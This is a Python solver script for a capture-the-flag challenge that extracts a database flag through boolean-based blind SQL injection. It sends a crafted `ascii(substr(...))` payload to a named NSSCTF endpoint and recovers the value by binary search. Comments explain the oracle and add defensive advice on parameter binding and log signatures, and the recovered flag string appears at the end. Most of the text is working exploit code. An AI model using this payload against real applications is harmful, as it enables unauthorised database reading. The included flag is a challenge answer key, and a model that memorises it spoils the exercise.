# Boolean-based blind SQL injection solver for a CTF challenge.
#
# Sample probe for the first character (the `payload` template below is the
# same string with the position and threshold left as format fields):
# 1^(ascii(substr((select(flag)from(flag)),1,1))>1)^1
#
# `1^(cond)^1` evaluates to the truth value of `cond`, so every request asks
# the database one yes/no question: "is the ASCII code of character i of the
# flag greater than this threshold?". The script reads the answer from whether
# the marker text in `mess_ok` appears in the response body.
#
# Defensive takeaway: the probe only works if the `id` POST field reaches the
# SQL statement as text (presumably by string concatenation; the server code
# is not shown here). Binding it as a query parameter, or casting it to an
# integer, closes the oracle. In request logs this shows up as a burst of
# near-identical POSTs to one endpoint whose `id` value contains
# `ascii(substr(`, roughly seven per recovered character.
import requests
import time

url = "http://node2.anna.nssctf.cn:28140/index.php"
payload = "1^(ascii(substr((select(flag)from(flag)),{},1))>{})^1"
# Text the script treats as the "condition was true" response.
mess_ok = "glzjin wants a girlfriend."
out = ""

i = 0
while True:
    i += 1
    # Binary search over the ASCII range 32..128 for character number i.
    low, high = 32, 128
    mid = (low + high) // 2
    while low < high:
        res = requests.post(url, data={"id": payload.format(i, mid)})
        if res.status_code == 429:
            # NOTE: a rate-limited response is not retried; it falls through
            # to the marker check below and is counted as a "false" answer.
            print("too fast")
            time.sleep(0.5)
        # Marker present -> character code is above mid; otherwise at or below.
        low, high = (mid + 1, high) if mess_ok in res.text else (low, mid)
        mid = (low + high) // 2
    # A search that ends on either boundary is taken as the end of the value.
    if low == 32 or high == 128:
        break
    out += chr(mid)
    print(out)
NSSCTF{b29f1060-322b-49af-8bb9-a90c4ff6c5a4}